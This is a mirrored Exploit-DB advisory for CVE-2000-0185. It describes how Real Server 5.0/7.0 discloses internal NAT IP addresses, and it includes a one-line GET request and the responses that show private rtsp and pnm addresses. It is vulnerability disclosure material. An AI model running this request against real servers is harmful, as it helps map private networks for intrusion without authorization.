- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 19805
- Проверка EDB
-
- Пройдено
- Автор
- TSCHWEIKLE
- Тип уязвимости
- REMOTE
- Платформа
- WINDOWS
- CVE
- cve-2000-0185
- Дата публикации
- 2000-03-08
GameHouse dldisplay - ActiveX control 0 / Real Server 5.0/7.0 Internal IP Address Disclosure
Код:
source: https://www.securityfocus.com/bid/1049/info
By default, Real Server includes the IP address of the server in data sent to the client. If the Real Server is installed on a machine in a NAT environment, (where requests from the outside network are handled by reverse proxy), this will reveal what are supposed to be private, hidden IP addresses.
$ GET http://realg2.example.com:8080/ramgen/foo.rm
reveals-
rtsp://192.168.11.12:554/foo.rm
--stop--
pnm://192.168.11.12:7070/foo.rm
server info:
WinNT Version 6.0.3.303- Источник
- www.exploit-db.com
